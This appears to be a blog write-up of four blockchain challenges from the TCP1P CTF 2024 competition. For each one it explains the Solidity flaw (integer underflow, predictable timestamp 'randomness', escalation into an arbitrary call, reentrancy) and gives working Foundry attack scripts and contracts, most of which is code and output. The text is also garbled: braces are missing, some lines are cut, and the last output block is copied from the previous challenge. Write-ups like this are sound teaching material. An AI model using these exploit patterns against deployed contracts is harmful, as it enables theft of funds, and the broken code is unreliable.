TCP1P CTF 2024 Blockchain Writeup
Hello! This week, I participated in TCP1P CTF 2024 as a member of the CyKor. Since I’ve been particularly interested in blockchain lately, I focused on solving blockchain challenges during the competition. In the end, out of the 6 blockchain challenges, I managed to solve 4. In this post, I’ll be sharing my solutions to those problems. You can find all the challenges here.
01. Baby ERC-20
New token standards huh?
This challenge required finding a vulnerability in the HCOIN contract and obtaining more than 1,000 HCOIN. The setup contract was as follows:
// SPDX-License-Identifier: MIT
pragma solidity 0.6.12;
import { HCOIN } from "./HCOIN.sol";
contract Setup {
HCOIN public coin;
address player;
constructor() public payable {
require(msg.value == 1 ether);
coin = new HCOIN();
coin.deposit{value: 1 ether}();
function setPlayer(address _player) public {
require(_player == msg.sender, "Player must be the same with the sender");
require(_player == tx.origin, "Player must be a valid Wallet/EOA");
player = _player;
function isSolved() public view returns (bool) {
return coin.balanceOf(player) > 1000 ether; // im rich :D
One interesting point was that the Solidity version used was 0.6.12, which is quite outdated. This version does not provide built-in protections against integer overflows and underflows, meaning such vulnerabilities could exist in the contract.
As expected, there was an underflow vulnerability in the HCOIN::transfer()
function transfer(address _to, uint256 _value) public returns (bool success) {
require(_to != address(0), "ERC20: transfer to the zero address");
require(balanceOf[msg.sender] - _value >= 0, "Insufficient Balance");
balanceOf[msg.sender] -= _value;
balanceOf[_to] += _value;
emit Transfer(msg.sender, _to, _value);
return true;
In the transfer function, there is a require check to ensure that the sender has a sufficient balance. However, due to the line:
require(balanceOf[msg.sender] - _value >= 0, "Insufficient Balance");
if _value
is greater than balanceOf[msg.sender]
, an underflow occurs, allowing the require statement to pass. Additionally, balanceOf[msg.sender] -= _value;
would cause the balance to underflow as well, leading to an unexpectedly large balance.
Another requirement to solve the challenge was to set our own address as the player by calling setPlayer()
in the Setup contract:
function setPlayer(address _player) public {
require(_player == msg.sender, "Player must be the same with the sender");
require(_player == tx.origin, "Player must be a valid Wallet/EOA");
player = _player;
Solution Script
This is my Solution Script that implements the above solution.
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;
import {console} from "forge-std/console.sol";
import {Script} from "forge-std/Script.sol";
import {Setup} from "../src/BabyERC-20/Setup.sol";
import {HCOIN} from "../src/BabyERC-20/HCOIN.sol";
contract SolveBabyERC is Script {
uint256 playerPrivateKey;
address player;
Setup setupInstance;
HCOIN hcoinInstance;
function setUp() external {
string memory rpcUrl = "";
playerPrivateKey = 0x2e95bce86940b659debae7e80857bf1e92eb2b1b8e5c6c9feaac00a93251fe43;
address setUpContract = 0x78fb4bcF652b5130f77A64A3Ea5489bE18b58B89;
player = vm.addr(playerPrivateKey);
setupInstance = Setup(setUpContract);
hcoinInstance = HCOIN(setupInstance.coin());
function run() external {
console.log("Before Player Balance: ", hcoinInstance.balanceOf(player) / 10**18);
hcoinInstance.transfer(vm.addr(1), 1);
console.log("After Player Balance: ", hcoinInstance.balanceOf(player) / 10**18);
console.log("isSolved: ", setupInstance.isSolved());
02. injus gambit
Inju owns all the things in the area, waiting for one worthy challenger to emerge. Rumor said, that there many ways from many different angle to tackle Inju. Are you the Challenger worthy to oppose him?
This challenge required setting the challengeManager
variable in the Privileged contract to address(0)
. The setup contract was as follows:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.26;
import "./Privileged.sol";
import "./ChallengeManager.sol";
contract Setup {
Privileged public privileged;
ChallengeManager public challengeManager;
Challenger1 public Chall1;
Challenger2 public Chall2;
constructor(bytes32 _key) payable{
privileged = new Privileged{value: 100 ether}();
challengeManager = new ChallengeManager(address(privileged), _key);
// prepare the challenger
Chall1 = new Challenger1{value: 5 ether}(address(challengeManager));
Chall2 = new Challenger2{value: 5 ether}(address(challengeManager));
function isSolved() public view returns(bool){
return address(privileged.challengeManager()) == address(0);
contract Challenger1 {
ChallengeManager public challengeManager;
constructor(address _target) payable{
require(msg.value == 5 ether);
challengeManager = ChallengeManager(_target);
challengeManager.approach{value: 5 ether}();
contract Challenger2 {
ChallengeManager public challengeManager;
constructor(address _target) payable{
require(msg.value == 5 ether);
challengeManager = ChallengeManager(_target);
challengeManager.approach{value: 5 ether}();
The Privileged::fireManager
function sets challengeManager
to address(0)
. However, calling this function requires owner privileges.
function fireManager() public onlyOwner{
challengeManager = address(0);
The ChallengeManager contract contained a function that allowed modifying the owner of the Privileged contract.
When the ChallengeManager::challengeCurrentOwner
function is called, the theChallenger
variable becomes the new owner. However, this function can only be called by theChallenger and requires the correct _key
as an argument. In other words, we needed to obtain the masterKey and gain theChallenger privileges.
bytes32 private masterKey;
modifier onlyChosenChallenger(){
require(msg.sender == theChallenger, "Not Chosen One");
function challengeCurrentOwner(bytes32 _key) public onlyChosenChallenger{
if(keccak256(abi.encodePacked(_key)) == keccak256(abi.encodePacked(masterKey))){
First, although masterKey
is a private variable, in the EVM, all private variables are stored in storage slots. This means we can directly query the storage slot to retrieve its value. Using the forge inspect
command, we can confirm that the masterKey
variable is stored in slot 1.
$ forge inspect ChallengeManager storage-layout --pretty
| Name | Type | Slot | Offset | Bytes | Contract |
| privileged | contract Privileged | 0 | 0 | 20 | src/ChallengeManager.sol:ChallengeManager |
| masterKey | bytes32 | 1 | 0 | 32 | src/ChallengeManager.sol:ChallengeManager |
| qualifiedChallengerFound | bool | 2 | 0 | 1 | src/ChallengeManager.sol:ChallengeManager |
| theChallenger | address | 2 | 1 | 20 | src/ChallengeManager.sol:ChallengeManager |
| casinoOwner | address | 3 | 0 | 20 | src/ChallengeManager.sol:ChallengeManager |
| challengingFee | uint256 | 4 | 0 | 32 | src/ChallengeManager.sol:ChallengeManager |
| challenger | address[] | 5 | 0 | 32 | src/ChallengeManager.sol:ChallengeManager |
| approached | mapping(address => bool) | 6 | 0 | 32 | src/ChallengeManager.sol:ChallengeManager |
Next, using the cast
command, we can query slot 1 of the Challenge contract and retrieve the masterKey
$ cast storage <ChallengeManager Address> 1 --rpc-url
Now, if we can obtain Challenger privileges, we will be able to call the challengeCurrentOwner function.
To obtain theChallenger
privileges, we need to use the ChallengeManager::upgradeChallengerAttribute
function. However, there seem to be several conditions that must be met to successfully gain theChallenger status.
function upgradeChallengerAttribute(uint256 challengerId, uint256 strangerId) public stillSearchingChallenger {
if (challengerId > privileged.challengerCounter()){
revert CM_InvalidIdOfChallenger();
if(strangerId > privileged.challengerCounter()){
revert CM_InvalidIdofStranger();
if(privileged.getRequirmenets(challengerId).challenger != msg.sender){
revert CM_CanOnlyChangeSelf();
uint256 gacha = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp))) % 4;
if (gacha == 0){
if(privileged.getRequirmenets(strangerId).isRich == false){
privileged.upgradeAttribute(strangerId, true, false, false, false);
}else if(privileged.getRequirmenets(strangerId).isImportant == false){
privileged.upgradeAttribute(strangerId, true, true, false, false);
}else if(privileged.getRequirmenets(strangerId).hasConnection == false){
privileged.upgradeAttribute(strangerId, true, true, true, false);
}else if(privileged.getRequirmenets(strangerId).hasVIPCard == false){
privileged.upgradeAttribute(strangerId, true, true, true, true);
qualifiedChallengerFound = true;
theChallenger = privileged.getRequirmenets(strangerId).challenger;
}else if (gacha == 1){
if(privileged.getRequirmenets(challengerId).isRich == false){
privileged.upgradeAttribute(challengerId, true, false, false, false);
}else if(privileged.getRequirmenets(challengerId).isImportant == false){
privileged.upgradeAttribute(challengerId, true, true, false, false);
}else if(privileged.getRequirmenets(challengerId).hasConnection == false){
privileged.upgradeAttribute(challengerId, true, true, true, false);
}else if(privileged.getRequirmenets(challengerId).hasVIPCard == false){
privileged.upgradeAttribute(challengerId, true, true, true, true);
qualifiedChallengerFound = true;
theChallenger = privileged.getRequirmenets(challengerId).challenger;
}else if(gacha == 2){
qualifiedChallengerFound = false;
theChallenger = address(0);
qualifiedChallengerFound = false;
theChallenger = address(0);
Upon further analysis, if the player’s ID (where the player is the owner) is used as both challengerId
and strangerId
, and if the gacha
value is 0 or 1 four times in a row, the theChallenger variable can be updated to the Player’s address.
Here, the gacha value is determined by:
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp))) % 4
Since it relies on block.timestamp
, it appears to be generated randomly. However, because block.timestamp
is a predictable value, we can exploit this by ensuring our transaction executes only when the desired gacha
value appears.
Solution Script
Here is my Solution Script implementing the above approach.
// SPDX-License-Identifier: MIT
// forge script SolveInjusGambit --broadcast --skip-simulation
pragma solidity ^0.8.26;
import {console} from "forge-std/console.sol";
import {Script} from "forge-std/Script.sol";
import {Setup} from "../src/InjusGambit/Setup.sol";
import {Privileged} from "../src/InjusGambit/Privileged.sol";
import {ChallengeManager} from "../src/InjusGambit/ChallengeManager.sol";
contract SolveInjusGambit is Script {
uint256 playerPrivateKey;
address player;
Setup setupInstance;
Privileged privilegedInstance;
ChallengeManager challengemanagerInstance;
function setUp() external {
string memory rpcUrl = "";
playerPrivateKey = 0x35c336336e238f3535ad592e40e0bfc3d7768df1484192a7ebe2473d2f2c0a2c;
address setUpContract = 0x123Fe56023E9267275AfFA0A93d32405d409e706;
player = vm.addr(playerPrivateKey);
setupInstance = Setup(setUpContract);
privilegedInstance = setupInstance.privileged();
challengemanagerInstance = setupInstance.challengeManager();
function run() external {
console.log("Player Balance:", player.balance / 10**18);
// uint slotIndex = 1;
// bytes32 slotData = vm.load(address(challengemanagerInstance), bytes32(slotIndex));
bytes32 slotData = 0x494e4a55494e4a55494e4a5553555045524b45594b45594b45594b45594b4559; // to broadcast
AttackContract attackInstance = new AttackContract{value: 5 ether}(setupInstance, privilegedInstance, challengemanagerInstance, slotData);
while (true) {
payable(0x0).transfer(1); // change block.timestamp()
vm.warp(block.timestamp + 1); // to test in local
if (address(privilegedInstance.challengeManager()) == address(0)) {
console.log("isSolved: ", setupInstance.isSolved());
contract AttackContract is Script {
Setup setupInstance;
Privileged privilegedInstance;
ChallengeManager challengemanagerInstance;
bytes32 slotData;
constructor(Setup _setupInstance, Privileged _privilegedInstance, ChallengeManager _challengemanagerInstance, bytes32 _slotData) payable {
setupInstance = _setupInstance;
privilegedInstance = _privilegedInstance;
challengemanagerInstance = _challengemanagerInstance;
slotData = _slotData;
function attack() public {
if ((uint256(keccak256(abi.encodePacked(address(this), block.timestamp))) % 4) > 1) {
console.log("gacha: ", uint256(keccak256(abi.encodePacked(address(this), block.timestamp))) % 4);
challengemanagerInstance.approach{value: 5 ether}();
uint256 Id = privilegedInstance.challengerCounter() - 1;
for (uint256 i = 0; i<4; i++) {
challengemanagerInstance.upgradeChallengerAttribute(Id, Id);
$ forge script SolveInjusGambit --broadcast --skip-simulation
[⠊] Compiling...
[⠒] Compiling 1 files with Solc 0.8.27
[⠑] Solc 0.8.27 finished in 1.51s
Compiler run successful!
Script ran successfully.
Gas used: 677996
== Logs ==
Player Balance: 10
gacha: 0
isSolved: true
03. Executive Problem
If only we managed to climb high enough, maybe we can dethrone someone?
The next challenge required sequentially escalating the Player’s privileges to eventually modify the crain
value in the Crain Contract. The Setup Contract code is as follows:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;
import "./Crain.sol";
import "./CrainExecutive.sol";
contract Setup{
CrainExecutive public cexe;
Crain public crain;
constructor() payable{
cexe = new CrainExecutive{value: 50 ether}();
crain = new Crain(payable(address(cexe)));
function isSolved() public view returns(bool){
return crain.crain() != address(this);
The only function that can modulate the crain
value is Crain::ascendToCrain
. This function can only be called from a CrainExecutive Contract.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;
import "./CrainExecutive.sol";
contract Crain{
CrainExecutive public ce;
address public crain;
modifier _onlyExecutives(){
require(msg.sender == address(ce), "Only Executives can replace");
constructor(address payable _ce) {
ce = CrainExecutive(_ce);
crain = msg.sender;
function ascendToCrain(address _successor) public _onlyExecutives{
crain = _successor;
receive() external payable { }
In the CrainExecutive contract, we can likely use the transfer
function to call the desired function. The transfer function executes a low-level call using the _message
and to
parameters provided by the user. This means we can set the to
parameter as the Crain Contract address and craft the appropriate calldata to execute our desired action.
modifier _onlyExecutive(){
require(isExecutive[msg.sender] == true, "Only Higher Ups can access!");
function transfer(address to, uint256 _amount, bytes memory _message) public _onlyExecutive{
require(to != address(0), "Invalid Recipient");
require(balanceOf[msg.sender] - _amount >= 0, "Not enough Credit");
uint256 totalSent = _amount;
balanceOf[msg.sender] -= totalSent;
balanceOf[to] += totalSent;
(bool transfered, ) = payable(to).call{value: _amount}(abi.encodePacked(_message));
require(transfered, "Failed to Transfer Credit!");
However, we needed the isExecutive permission to call the transfer function.
To obtain isExecutive
privileges, the player must first sequentially acquire isEmployee
and isManager
privileges. During this process, the buyCredit
function must be used to increase the player’s balance. Since the challenge environment provides the player with sufficient ether, this step can be easily completed.
function becomeEmployee() public {
isEmployee[msg.sender] = true;
function becomeManager() public _onlyEmployee{
require(balanceOf[msg.sender] >= 1 ether, "Must have at least 1 ether");
require(isEmployee[msg.sender] == true, "Only Employee can be promoted");
isManager[msg.sender] = true;
function becomeExecutive() public {
require(isEmployee[msg.sender] == true && isManager[msg.sender] == true);
require(balanceOf[msg.sender] >= 5 ether, "Must be that Rich to become an Executive");
isExecutive[msg.sender] = true;
function buyCredit() public payable _onlyEmployee{
require(msg.value >= 1 ether, "Minimum is 1 Ether");
uint256 totalBought = msg.value;
balanceOf[msg.sender] += totalBought;
totalSupply += totalBought;
Solution Script
Here is my Solution Script implementing the approach described above.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;
import {console} from "forge-std/console.sol";
import {Script} from "forge-std/Script.sol";
import {Setup} from "../src/ExecutiveProblem/Setup.sol";
import {CrainExecutive} from "../src/ExecutiveProblem/CrainExecutive.sol";
import {Crain} from "../src/ExecutiveProblem/Crain.sol";
contract SolveExecutiveProblem is Script {
address owner;
address player;
uint256 playerPrivateKey;
Setup setupInstance;
Crain crainInstance;
CrainExecutive crainexecutiveInstance;
function setUp() external {
string memory rpcUrl = "";
playerPrivateKey = 0xbdf0189f8c30902fb42990f6826dd5abcb9fbb1783b8c9aac85254680c0c78fe;
address setUpContract = 0xddf8F8Ed9aCA4B46632BfbeCb5733A066da40070;
player = vm.addr(playerPrivateKey);
setupInstance = Setup(setUpContract);
crainInstance = setupInstance.crain();
crainexecutiveInstance = setupInstance.cexe();
function run() external {
crainexecutiveInstance.buyCredit{value: 5 ether}();
bytes memory message = abi.encodeCall(crainInstance.ascendToCrain, (address(0x0)));
crainexecutiveInstance.transfer(address(crainInstance), 0, message);
console.log("isSolved: ", setupInstance.isSolved());
$ forge script SolveExecutiveProblem
[⠊] Compiling...
[⠔] Compiling 19 files with Solc 0.8.27
[⠒] Solc 0.8.27 finished in 1.45s
Compiler run successful!
Script ran successfully.
Gas used: 160223
== Logs ==
isSolved: true
04. Unsolveable Money Captcha
Oh no! Hackerika just made a super-duper mysterious block chain thingy! I’m not sure what she’s up to, maybe creating a super cool bank app? But guess what? It seems a bit wobbly because it’s asking us to solve a super tricky captcha! What a silly kid! Let’s help her learn how to make a super-duper awesome contract with no head-scratching captcha! XD
In this challenge, the goal was to drain all funds from the moneyContract, which initially holds 10 ether
. The Setup Contract code is as follows:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "./Money.sol";
contract Setup {
Money public immutable moneyContract;
Captcha public immutable captchaContract;
constructor() payable {
require(msg.value == 100 ether);
captchaContract = new Captcha();
moneyContract = new Money(captchaContract);{value: 10 ether}();
function isSolved() public view returns (bool) {
return address(moneyContract).balance == 0;
In the Money Contract, funds can be deposited using the save
function and withdrawn using the load
function save() public payable {
require(msg.value > 0, "You don't have money XP");
balances[msg.sender] += msg.value;
function load(uint256 userProvidedCaptcha) public {
uint balance = balances[msg.sender];
require(balance > 0, "You don't have money to load XD");
uint256 generatedCaptcha = captchaContract.generateCaptcha(secret);
require(userProvidedCaptcha == generatedCaptcha, "Invalid captcha");
(bool success,) ={value: balance}("");
require(success, 'Oh my god, what is that!?');
balances[msg.sender] = 0;
However, the load function contains a reentrancy attack vulnerability. This is because it transfers funds using a low-level call before updating balances[msg.sender]
(bool success,) ={value: balance}("");
require(success, 'Oh my god, what is that!?');
balances[msg.sender] = 0;
Solution Script
Here is my Solution Script that successfully executed the reentrancy attack and drained all funds from the moneyContract.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;
import {console} from "forge-std/console.sol";
import {Script} from "forge-std/Script.sol";
import {Setup} from "../src/UnsolveableMoneyCaptcha/Setup.sol";
import {Money} from "../src/UnsolveableMoneyCaptcha/Money.sol";
import {Captcha} from "../src/UnsolveableMoneyCaptcha/Captcha.sol";
contract SolveUnsolveableMoneyCaptcha is Script {
address player;
uint256 playerPrivateKey;
Setup setupInstance;
Money moneyInstance;
Captcha captchaInstance;
function setUp() external {
string memory rpcUrl = "";
playerPrivateKey = 0x35342fe50f9cb61e0596a086a7c2e1641a084135137c13456c5db0ec4e4d7adc;
address setUpContract = 0xccB5d206beaB580F352020b782cff04A80568E77;
player = vm.addr(playerPrivateKey);
setupInstance = Setup(setUpContract);
captchaInstance = setupInstance.captchaContract();
moneyInstance = setupInstance.moneyContract();
function run() external {
AttakContract attackcontractInstance = new AttakContract{value: 50 ether}(setupInstance, captchaInstance, moneyInstance);
console.log("Before Player balance: ", moneyInstance.balances(player));
console.log("After Player balance: ", moneyInstance.balances(player));
console.log("isSolved: ", setupInstance.isSolved());
contract AttakContract {
Setup setupInstance;
Captcha captchaInstance;
Money moneyInstance;
uint256 secret;
constructor(Setup _setupInstance, Captcha _captchaInstance, Money _moneyInstance) payable {
setupInstance = _setupInstance;
captchaInstance = _captchaInstance;
moneyInstance = _moneyInstance;
function attack() public {{value: 10 ether}();
secret = moneyInstance.secret();
uint256 generatedCaptcha = captchaInstance.generateCaptcha(secret);
receive() external payable {
if (address(moneyInstance).balance != 0) {
uint256 generatedCaptcha = captchaInstance.generateCaptcha(secret);
$ forge script SolveExecutiveProblem
[⠊] Compiling...
[⠔] Compiling 19 files with Solc 0.8.26
[⠒] Solc 0.8.27 finished in 1.45s
Compiler run successful!
Script ran successfully.
Gas used: 160223
== Logs ==
isSolved: true